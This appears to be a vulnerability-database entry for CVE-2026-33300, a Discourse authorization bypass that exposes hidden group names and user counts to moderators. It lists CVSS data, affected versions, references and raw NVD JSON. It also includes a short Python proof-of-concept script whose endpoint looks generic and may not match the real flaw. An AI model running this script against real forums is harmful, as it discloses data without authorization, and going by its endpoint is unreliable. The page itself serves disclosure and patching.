CVE-2026-33300

Description

Discourse is an open-source discussion platform. From versions 2026.1.0-latest to before 2026.1.3, 2026.2.0-latest to before 2026.2.2, and 2026.3.0-latest to before 2026.3.0, an authorization bypass in the Category Chatables Controller show action allowed moderators to get information on hidden groups names and user count. This issue has been patched in versions 2026.1.3, 2026.2.2, and 2026.3.0.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:discourse:discourse:*:*:*:*:latest:*:*:* - VULNERABLE

cpe:2.3:a:discourse:discourse:2026.3.0:*:*:*:latest:*:*:* - VULNERABLE

cpe:2.3:a:discourse:discourse:2026.3.0:*:*:*:latest.1:*:*:* - VULNERABLE

Discourse 2026.1.0 - 2026.1.2

Discourse 2026.2.0 - 2026.2.1

Discourse 2026.3.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Exploit for CVE-2026-33300
# Target: Discourse Instance
# Description: Bypass authorization to access hidden group info

target_url = "http://target.com/category_chatables/show.json"

# Cookies for a user with Moderator privileges
cookies = {
    "_forum_session": "valid_moderator_cookie"
}

response = requests.get(target_url, cookies=cookies)

if response.status_code == 200:
    print("[+] Authorization bypass successful!")
    data = response.json()
    print(f"Hidden Group Name: {data.get('group_name')}")
    print(f"User Count: {data.get('user_count')}")
else:
    print("[-] Exploit failed")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-33300
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-33300
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-33300/
[4] VulDB https://vuldb.com/cve/CVE-2026-33300
[5] https://github.com/discourse/discourse/commit/07f66658cce81a099a0d7115db5f3c69f5d3cca2
[6] https://github.com/discourse/discourse/security/advisories/GHSA-wrwm-vqx2-6x4v

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-33300", "sourceIdentifier": "[email protected]", "published": "2026-03-31T18:16:52.267", "lastModified": "2026-04-09T16:20:28.827", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Discourse is an open-source discussion platform. From versions 2026.1.0-latest to before 2026.1.3, 2026.2.0-latest to before 2026.2.2, and 2026.3.0-latest to before 2026.3.0, an authorization bypass in the Category Chatables Controller show action allowed moderators to get information on hidden groups names and user count. This issue has been patched in versions 2026.1.3, 2026.2.2, and 2026.3.0."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-200"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:discourse:discourse:*:*:*:*:latest:*:*:*", "versionStartIncluding": "2026.1.0", "versionEndExcluding": "2026.1.3", "matchCriteriaId": "F64DA8FA-BC32-4EB9-B508-6425684D3245"}, {"vulnerable": true, "criteria": "cpe:2.3:a:discourse:discourse:*:*:*:*:latest:*:*:*", "versionStartIncluding": "2026.2.0", "versionEndExcluding": "2026.2.2", "matchCriteriaId": "26546710-17B3-4C72-930F-3BE0AD969127"}, {"vulnerable": true, "criteria": "cpe:2.3:a:discourse:discourse:2026.3.0:*:*:*:latest:*:*:*", "matchCriteriaId": "E3FE9277-4F6B-4FD0-991F-F0FB8D226E1C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:discourse:discourse:2026.3.0:*:*:*:latest.1:*:*:*", "matchCriteriaId": "DFA536C2-E9D9-4A03-89C2-C344DE682EA1"}]}]}], "references": [{"url": "https://github.com/discourse/discourse/commit/07f66658cce81a099a0d7115db5f3c69f5d3cca2", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/discourse/discourse/security/advisories/GHSA-wrwm-vqx2-6x4v", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}